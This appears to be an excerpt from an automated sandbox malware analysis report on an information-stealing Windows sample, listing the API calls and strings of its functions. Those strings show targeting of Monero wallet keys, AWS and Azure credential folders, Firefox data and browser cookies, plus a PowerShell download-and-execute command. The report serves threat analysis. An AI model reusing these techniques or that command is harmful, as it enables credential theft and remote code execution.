                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$FolderPathlstrcat
                          • String ID: \..\
                          • API String ID: 2938889746-4220915743
                          • Opcode ID: 9814d9e16748deec3a98040a6e6217784a6694f7afaf6491d426f4472520f408
                          • Instruction ID: 63cf2e4f50fde46500b88534a00e9cc9c854054e7a8e00daa8a15d39c07ec743
                          • Opcode Fuzzy Hash: 9814d9e16748deec3a98040a6e6217784a6694f7afaf6491d426f4472520f408
                          • Instruction Fuzzy Hash: CFF1B170A122599BCB21EF65D849AAF77B8AF68340F048129F855E7352DB3CDD43CB90
                          APIs
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007E43A3
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007E43D6
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E43FE
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007E4409
                          • lstrlen.KERNEL32(\storage\default\), ref: 007E4414
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E4431
                          • lstrcat.KERNEL32(00000000,\storage\default\), ref: 007E443D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E4466
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007E4471
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E4498
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E44D7
                          • lstrcat.KERNEL32(00000000,?), ref: 007E44DF
                          • lstrlen.KERNEL32(00801794), ref: 007E44EA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E4507
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007E4513
                          • lstrlen.KERNEL32(.metadata-v2), ref: 007E451E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E453B
                          • lstrcat.KERNEL32(00000000,.metadata-v2), ref: 007E4547
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E456E
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E45A0
                          • GetFileAttributesA.KERNEL32(00000000), ref: 007E45A7
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E4601
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E462A
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E4653
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E467B
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007E46AF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$AttributesFile
                          • String ID: .metadata-v2$\storage\default\
                          • API String ID: 1033685851-762053450
                          • Opcode ID: 33e88db1061f06ef8b873ba9e946dd619771992678a6d0d8f705e54b690d72e1
                          • Instruction ID: 0757ab797b301ef843929a3ba19a277c73b6e47e4af6583370ff34e9a4e631de
                          • Opcode Fuzzy Hash: 33e88db1061f06ef8b873ba9e946dd619771992678a6d0d8f705e54b690d72e1
                          • Instruction Fuzzy Hash: ABB15E71A1225A9BCB21EFB5DD4DA6F77B8AF58300F045125B845E7352DB38ED038B90
                          APIs
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007E57D5
                          • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 007E5804
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E5835
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E585D
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007E5868
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E5890
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E58C8
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007E58D3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E58F8
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007E592E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E5956
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007E5961
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E5988
                          • lstrlen.KERNEL32(00801794), ref: 007E599A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E59B9
                          • lstrcat.KERNEL32(00000000,00801794), ref: 007E59C5
                          • lstrlen.KERNEL32(0125D6A0), ref: 007E59D4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E59F7
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007E5A02
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E5A2C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E5A58
                          • GetFileAttributesA.KERNEL32(00000000), ref: 007E5A5F
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E5AB7
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E5B2D
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E5B56
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E5B89
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E5BB5
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007E5BEF
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E5C4C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E5C70
                          • API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
                          • String ID:
                          • API String ID: 2428362635-0
                          • Opcode ID: 0fdca6304d09e5e4ea9f45891987cf0288adef1a94e5229231bfb2c23ed94ad3
                          • Instruction ID: 5b617e59f65a99a1531ee25527cde75db2f18b84e0bb4c4bfc3c68072e70c182
                          • Opcode Fuzzy Hash: 0fdca6304d09e5e4ea9f45891987cf0288adef1a94e5229231bfb2c23ed94ad3
                          • Instruction Fuzzy Hash: CB02B771A0165DDBCB21EFA5C889AAF7BB5AF58304F148129F845A7352DB38DC43CB90
                          APIs
                            • Part of subcall function 007D1120: GetProcessHeap.KERNEL32(00000000,00000104), ref: 007D1135
                            • Part of subcall function 007D1120: RtlAllocateHeap.NTDLL(00000000), ref: 007D113C
                            • Part of subcall function 007D1120: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 007D1159
                            • Part of subcall function 007D1120: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 007D1173
                            • Part of subcall function 007D1120: RegCloseKey.ADVAPI32(?), ref: 007D117D
                          • lstrcat.KERNEL32(?,00000000), ref: 007D11C0
                          • lstrlen.KERNEL32(?), ref: 007D11CD
                          • lstrcat.KERNEL32(?,.keys), ref: 007D11E8
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007D121F
                          • lstrlen.KERNEL32(01259298), ref: 007D122D
                          • lstrcpy.KERNEL32(00000000,?), ref: 007D1251
                          • lstrcat.KERNEL32(00000000,01259298), ref: 007D1259
                          • lstrlen.KERNEL32(\Monero\wallet.keys), ref: 007D1264
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D1288
                          • lstrcat.KERNEL32(00000000,\Monero\wallet.keys), ref: 007D1294
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D12BA
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007D12FF
                          • lstrlen.KERNEL32(0125D580), ref: 007D130E
                          • lstrcpy.KERNEL32(00000000,?), ref: 007D1335
                          • lstrcat.KERNEL32(00000000,?), ref: 007D133D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D1378
                          • lstrcat.KERNEL32(00000000), ref: 007D1385
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D13AC
                          • CopyFileA.KERNEL32(?,?,00000001), ref: 007D13D5
                          • lstrcpy.KERNEL32(00000000,?), ref: 007D1401
                          • lstrcpy.KERNEL32(00000000,?), ref: 007D143D
                            • Part of subcall function 007EEDE0: lstrcpy.KERNEL32(00000000,?), ref: 007EEE12
                          • DeleteFileA.KERNEL32(?), ref: 007D1471
                          • API ID: lstrcpy$lstrcat$lstrlen$FileHeap$AllocateCloseCopyDeleteOpenProcessQueryValue
                          • String ID: .keys$\Monero\wallet.keys
                          • API String ID: 2881711868-3586502688
                          • Opcode ID: 41924c91a6412914319bee7177eefb75c5ddb2a5a6f01b5bb560e08651280679
                          • Instruction ID: b465516cf9302d3c3a3ff09b5f3c2246093c87fe89dce5403f54cc37890caa1a
                          • Opcode Fuzzy Hash: 41924c91a6412914319bee7177eefb75c5ddb2a5a6f01b5bb560e08651280679
                          • Instruction Fuzzy Hash: 2FA17271A1021AABDB21EFB4DD89AAF77B9AF54300F444125F945E7352DB38ED038B90
                          APIs
                          • memset.MSVCRT ref: 007EE740
                          • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 007EE769
                          • lstrcpy.KERNEL32(00000000,?), ref: 007EE79F
                          • lstrcat.KERNEL32(?,00000000), ref: 007EE7AD
                          • lstrcat.KERNEL32(?,\.azure\), ref: 007EE7C6
                          • memset.MSVCRT ref: 007EE805
                          • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 007EE82D
                          • lstrcpy.KERNEL32(00000000,?), ref: 007EE85F
                          • lstrcat.KERNEL32(?,00000000), ref: 007EE86D
                          • lstrcat.KERNEL32(?,\.aws\), ref: 007EE886
                          • memset.MSVCRT ref: 007EE8C5
                          • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 007EE8F1
                          • lstrcpy.KERNEL32(00000000,?), ref: 007EE920
                          • lstrcat.KERNEL32(?,00000000), ref: 007EE92E
                          • lstrcat.KERNEL32(?,\.IdentityService\), ref: 007EE947
                          • memset.MSVCRT ref: 007EE986
                          • API ID: lstrcat$memset$FolderPathlstrcpy
                          • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                          • API String ID: 4067350539-3645552435
                          • Opcode ID: 281eeb59ec1406d0257fcac9114d8e9f5ed119722bafcde9d98aafd0faaa5e95
                          • Instruction ID: 206531f6bfd15ab4104a0573226ca888135291a56336638ad6a32f2abfa23423
                          • Opcode Fuzzy Hash: 281eeb59ec1406d0257fcac9114d8e9f5ed119722bafcde9d98aafd0faaa5e95
                          • Instruction Fuzzy Hash: FD710B71A4022DABD761EBA4DC4AFED7374EF58700F004894B719AB2C1DE789E468B54
                          APIs
                          • lstrcpy.KERNEL32 ref: 007EABCF
                          • lstrlen.KERNEL32(0125E088), ref: 007EABE5
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007EAC0D
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007EAC18
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007EAC41
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007EAC84
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007EAC8E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007EACB7
                          • lstrlen.KERNEL32(00804AD4), ref: 007EACD1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007EACF3
                          • lstrcat.KERNEL32(00000000,00804AD4), ref: 007EACFF
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007EAD28
                          • lstrlen.KERNEL32(00804AD4), ref: 007EAD3A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007EAD5C
                          • lstrcat.KERNEL32(00000000,00804AD4), ref: 007EAD68
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007EAD91
                          • lstrlen.KERNEL32(0125E028), ref: 007EADA7
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007EADCF
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007EADDA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007EAE03
                          • lstrcpy.KERNEL32(00000000,?), ref: 007EAE3F
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007EAE49
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007EAE6F
                          • lstrlen.KERNEL32(00000000), ref: 007EAE85
                          • lstrcpy.KERNEL32(00000000,0125E070), ref: 007EAEB8
                          • API ID: lstrcpy$lstrcat$lstrlen
                          • String ID: f
                          • API String ID: 2762123234-1993550816
                          • Opcode ID: 98fd1c4a5909b27d4b91866ec84d56ebd27ba2538f9d1c01fa91f4f76a2a5958
                          • Instruction ID: 9c1e62ff53123848ff4bb97cbc78a2fed6a7099c3b092602ce9d48076271660e
                          • Opcode Fuzzy Hash: 98fd1c4a5909b27d4b91866ec84d56ebd27ba2538f9d1c01fa91f4f76a2a5958
                          • Instruction Fuzzy Hash: 4CB15130A1156AEBCB21EFA5DC4DAAF77B9EF54300F044525B815A7262DB38ED03CB91
                          APIs
                          • LoadLibraryA.KERNEL32(ws2_32.dll,?,007E72A4), ref: 007F47E6
                          • GetProcAddress.KERNEL32(00000000,connect), ref: 007F47FC
                          • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 007F480D
                          • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 007F481E
                          • GetProcAddress.KERNEL32(00000000,htons), ref: 007F482F
                          • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 007F4840
                          • GetProcAddress.KERNEL32(00000000,recv), ref: 007F4851
                          • GetProcAddress.KERNEL32(00000000,socket), ref: 007F4862
                          • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 007F4873
                          • GetProcAddress.KERNEL32(00000000,closesocket), ref: 007F4884
                          • GetProcAddress.KERNEL32(00000000,send), ref: 007F4895
                          • API ID: AddressProc$LibraryLoad
                          • String ID: WSACleanup$WSAStartup$closesocket$connect$freeaddrinfo$getaddrinfo$htons$recv$send$socket$ws2_32.dll
                          • API String ID: 2238633743-3087812094
                          • Opcode ID: 625c0e94d280d3dacabbf9fc7a2e2bae4f61fe4b12697ca7d5080ed8a87ed3b4
                          • Instruction ID: 76749b6ddbc311a1b09ba5f2b951e943d0839673fc961909ca136aeeef06ab3f
                          • Opcode Fuzzy Hash: 625c0e94d280d3dacabbf9fc7a2e2bae4f61fe4b12697ca7d5080ed8a87ed3b4
                          • Instruction Fuzzy Hash: 14118771952B28ABC750DFF4EC0DA573AB8FA09B05304081AF5A1D22A5DBFC8443DF68
                          APIs
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007EBE53
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007EBE86
                          • lstrlen.KERNEL32(-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 007EBE91
                          • lstrcpy.KERNEL32(00000000,?), ref: 007EBEB1
                          • lstrcat.KERNEL32(00000000,-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 007EBEBD
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007EBEE0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007EBEEB
                          • lstrlen.KERNEL32(')"), ref: 007EBEF6
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007EBF13
                          • lstrcat.KERNEL32(00000000,')"), ref: 007EBF1F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007EBF46
                          • lstrlen.KERNEL32(C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 007EBF66
                          • lstrcpy.KERNEL32(00000000,?), ref: 007EBF88
                          • lstrcat.KERNEL32(00000000,C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 007EBF94
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007EBFBA
                          • ShellExecuteEx.SHELL32(?), ref: 007EC00C
                          • API ID: lstrcpy$lstrcat$lstrlen$ExecuteShell
                          • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          • API String ID: 4016326548-898575020
                          • Opcode ID: 5ffe1a7ebedb5948da709660b48860ed9d0be4c4086c2397100f9dab7d963d1c
                          • Instruction ID: 97922d422e60baea2669d1e84b4cc5c65ca5c4ffbfc5c2498ebb13fa66843921
                          • Opcode Fuzzy Hash: 5ffe1a7ebedb5948da709660b48860ed9d0be4c4086c2397100f9dab7d963d1c
                          • Instruction Fuzzy Hash: 49618271A1225A9BCB21EFB59C896AF7BB8EF58300F045425F905E3352DB3CD9038B91
                          APIs
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007F184F
                          • lstrlen.KERNEL32(01247318), ref: 007F1860
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007F1887
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007F1892
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007F18C1
                          • lstrlen.KERNEL32(00804FA0), ref: 007F18D3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007F18F4
                          • lstrcat.KERNEL32(00000000,00804FA0), ref: 007F1900
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007F192F
                          • lstrlen.KERNEL32(01247328), ref: 007F1945
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007F196C
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007F1977
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007F19A6
                          • lstrlen.KERNEL32(00804FA0), ref: 007F19B8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007F19D9
                          • lstrcat.KERNEL32(00000000,00804FA0), ref: 007F19E5
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007F1A14
                          • lstrlen.KERNEL32(012472D8), ref: 007F1A2A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007F1A51
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007F1A5C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007F1A8B
                          • lstrlen.KERNEL32(01247348), ref: 007F1AA1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007F1AC8
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007F1AD3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007F1B02
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcatlstrlen
                          • String ID:
                          • API String ID: 1049500425-0
                          • Opcode ID: 7febf7bf9c13f1c0091611111178d080a883f5b6df71cfcbf7cdd3fa878b5028
                          • Instruction ID: 8c17cf9054e1163c621d79cdfe1d81581485c9acb4d8ea3abe7ba328b6a6e6d8
                          • Opcode Fuzzy Hash: 7febf7bf9c13f1c0091611111178d080a883f5b6df71cfcbf7cdd3fa878b5028
                          • Instruction Fuzzy Hash: 899129B060120BDBD720DFB5DC98A26B7E8EF14340F549829A996D3352DB78E8438B50
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E4793
                          • LocalAlloc.KERNEL32(00000040,?), ref: 007E47C5
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007E4812
                          • lstrlen.KERNEL32(00804B60), ref: 007E481D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E483A
                          • lstrcat.KERNEL32(00000000,00804B60), ref: 007E4846
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E486B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E4898
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007E48A3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007E48CA
                          • StrStrA.SHLWAPI(?,00000000), ref: 007E48DC
                          • lstrlen.KERNEL32(?), ref: 007E48F0
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007E4931
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E49B8
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E49E1
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E4A0A
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E4A30
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E4A5D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcatlstrlen$AllocLocal
                          • String ID: ^userContextId=4294967295$moz-extension+++
                          • API String ID: 4107348322-3310892237
                          • Opcode ID: df7096a69f2d1a9edb062d41b785425f099c4cbe8a2f723e7c0c6bb8efd4ae88
                          • Instruction ID: bbf2398961e53fd24c8d763de912387c01dc438302ac5d9100bab4e5685bc1e9
                          • Opcode Fuzzy Hash: df7096a69f2d1a9edb062d41b785425f099c4cbe8a2f723e7c0c6bb8efd4ae88
                          • Instruction Fuzzy Hash: 1FB17471A1125A9BCB21EFB5D849AAF77B9EF54300F049529FC45A7312DB38EC078B90
                          APIs
                            • Part of subcall function 007D90C0: InternetOpenA.WININET(007FCFEC,00000001,00000000,00000000,00000000), ref: 007D90DF
                            • Part of subcall function 007D90C0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 007D90FC
                            • Part of subcall function 007D90C0: InternetCloseHandle.WININET(00000000), ref: 007D9109
                          • strlen.MSVCRT ref: 007D92E1
                          • strlen.MSVCRT ref: 007D92FA
                            • Part of subcall function 007D8980: std::_Xinvalid_argument.LIBCPMT ref: 007D8996
                          • strlen.MSVCRT ref: 007D9399
                          • strlen.MSVCRT ref: 007D93E6
                          • lstrcat.KERNEL32(?,cookies), ref: 007D9547
                          • lstrcat.KERNEL32(?,00801794), ref: 007D9559
                          • lstrcat.KERNEL32(?,?), ref: 007D956A
                          • lstrcat.KERNEL32(?,00804B98), ref: 007D957C
                          • lstrcat.KERNEL32(?,?), ref: 007D958D
                          • lstrcat.KERNEL32(?,.txt), ref: 007D959F
                          • lstrlen.KERNEL32(?), ref: 007D95B6
                          • lstrlen.KERNEL32(?), ref: 007D95DB
                          • lstrcpy.KERNEL32(00000000,?), ref: 007D9614
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$strlen$Internet$Openlstrlen$CloseHandleXinvalid_argumentlstrcpystd::_
